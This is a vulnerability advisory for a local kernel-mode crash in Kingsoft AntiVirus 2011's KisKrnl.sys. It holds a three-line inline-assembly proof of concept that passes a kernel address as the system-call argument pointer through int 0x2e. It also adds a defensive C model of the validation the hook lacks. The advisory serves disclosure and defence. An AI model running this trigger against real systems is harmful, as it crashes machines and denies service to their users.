vendor:
Kingsoft AntiVirus 2011
by:
MJ0011
CVSS: 7.2 (HIGH)
Local Kernel Mode Denial of Service (DoS)
CWE: 399
Product Name: Kingsoft AntiVirus 2011
Affected Version From: KingSoft AntiVirus 2011 SP5.2
Affected Version To: KingSoft AntiVirus 2011 SP5.2 with KisKrnl.sys <=2011.1.13.89
Patch Exists: YES
Related CWE: N/A
CPE: a:kingsoft:kingsoft_antivirus:2011
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: Windows XP SP3
2011

Kingsoft AntiVirus 2011 SP5.2 KisKrnl.sys <= 2011.1.13.89 Local Kernel Mode D.O.S Exploit

KisKrnl.sys hooks the kernel function KiFastCallEntry but does not correctly handle the user stack pointer. On the legacy int 0x2e system-call gate, eax carries the service id and edx carries the user-stack pointer to the call's arguments; both are set by the caller, so a hook that sits in the dispatch path must validate edx before reading through it. The exploit is a few lines of inline assembly: it loads edx with 0x80000000 (the first kernel-space address on 32-bit Windows with the default 2 GB split, so not a user stack at all) and eax with 0x101 (the NtTerminateProcess service id on Windows XP), then executes int 0x2e. The hook uses the unvalidated pointer, and the resulting kernel-mode fault crashes the machine: a local denial of service triggered from user mode.

Mitigation:

Apply the latest security patches and updates from the vendor; only builds shipping a KisKrnl.sys newer than 2011.1.13.89 are unaffected.

Exploit-DB raw data:

# Kingsoft AntiVirus 2011 SP5.2 KisKrnl.sys <= 2011.1.13.89 Local Kernel Mode D.O.S Exploit
# Date: 2011-1-16
# Author: MJ0011
# Software Link: http://cd001.www.duba.net/duba/install/2011/once/KAV110114_DOWN_9_13.exe
# Version: KingSoft AntiVirus 2011 SP5.2 with KisKrnl.sys <=2011.1.13.89
# Tested on: Windows XP SP3

DETAILS:
KisKrnl.sys hooks the kernel function KiFastCallEntry, but does not correctly handle the user stack pointer.

EXPLOIT CODE:

// MSVC 32-bit inline assembly; the advisory gives only this fragment, not a complete program
__asm
{
    mov edx , 0x80000000   ; argument pointer ("user stack") set to a kernel-space address the hook never validates
    mov eax , 0x101        ; id of NtTerminateProcess under Windows XP
    int 0x2e               ; legacy system-call gate (int 0x2e rather than sysenter)
}
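The check the hook is missing, as an added example that is not part of the advisory or of Kingsoft's code: a user-mode C model of the validation a system-call dispatch hook has to perform on eax/edx before it touches the caller's argument block. The MmUserProbeAddress value (0x7FFF0000 on 32-bit Windows without /3GB), the argument-count table and the function names are assumptions made for this demonstration; the advisory's own trigger values (eax=0x101, edx=0x80000000) are the first thing the model rejects.

```c
#include <stdint.h>
#include <stdbool.h>
#include <stddef.h>
#include <stdio.h>

/*
 * Added example, not the advisory's or Kingsoft's code.
 * Models the check a KiFastCallEntry / int 0x2e hook needs before it reads
 * the caller's argument block: eax is the service id, edx the user-stack
 * pointer to the arguments, and both are attacker-controlled.
 *
 * Assumption: 32-bit Windows XP without /3GB, where the kernel's
 * MmUserProbeAddress is 0x7FFF0000 and 0x80000000 upward is kernel space.
 */
#define MM_USER_PROBE_ADDRESS 0x7FFF0000u

/* Constructed argument-count table for the demonstration only. A real driver
 * would consult the service descriptor table's argument-size array instead. */
static const struct { uint32_t id; uint32_t nargs; } kArgTable[] = {
    { 0x101, 2 },   /* NtTerminateProcess(ProcessHandle, ExitStatus); XP id per the advisory */
};

typedef enum {
    HOOK_OK,               /* safe to copy nargs DWORDs starting at edx */
    HOOK_UNKNOWN_SERVICE,  /* id not in the table: leave the call alone */
    HOOK_BAD_USER_STACK,   /* argument block not wholly inside user space */
} hook_verdict;

static bool lookup_nargs(uint32_t id, uint32_t *nargs)
{
    for (size_t i = 0; i < sizeof kArgTable / sizeof kArgTable[0]; i++) {
        if (kArgTable[i].id == id) {
            *nargs = kArgTable[i].nargs;
            return true;
        }
    }
    return false;
}

/* True iff [base, base + len) lies entirely below MmUserProbeAddress and the
 * end address does not wrap around 32 bits (the classic probe mistake). */
static bool range_is_user(uint32_t base, uint32_t len)
{
    if (len > UINT32_MAX - base)        /* base + len would overflow */
        return false;
    return base + len <= MM_USER_PROBE_ADDRESS;
}

/* The decision the hook should make on entry, from the registers the caller set. */
hook_verdict check_syscall_args(uint32_t eax, uint32_t edx)
{
    uint32_t nargs;
    if (!lookup_nargs(eax, &nargs))
        return HOOK_UNKNOWN_SERVICE;
    if (!range_is_user(edx, nargs * 4u))
        return HOOK_BAD_USER_STACK;
    return HOOK_OK;
}

int main(void)
{
    /* The advisory's trigger: eax = 0x101, edx = 0x80000000. */
    hook_verdict v = check_syscall_args(0x101, 0x80000000u);
    printf("eax=0x101 edx=0x80000000 -> %s\n",
           v == HOOK_BAD_USER_STACK ? "rejected: kernel-space argument pointer"
                                    : "accepted");
    return v == HOOK_BAD_USER_STACK ? 0 : 1;
}
```

The end-of-range comparison is what catches a pointer that is itself below the probe address but whose argument block straddles the user/kernel boundary, and the overflow guard is what keeps a pointer near 0xFFFFFFFF from wrapping into an "in range" end address; in a real driver the equivalent is wrapping the copy in ProbeForRead plus a try/except rather than dereferencing edx directly.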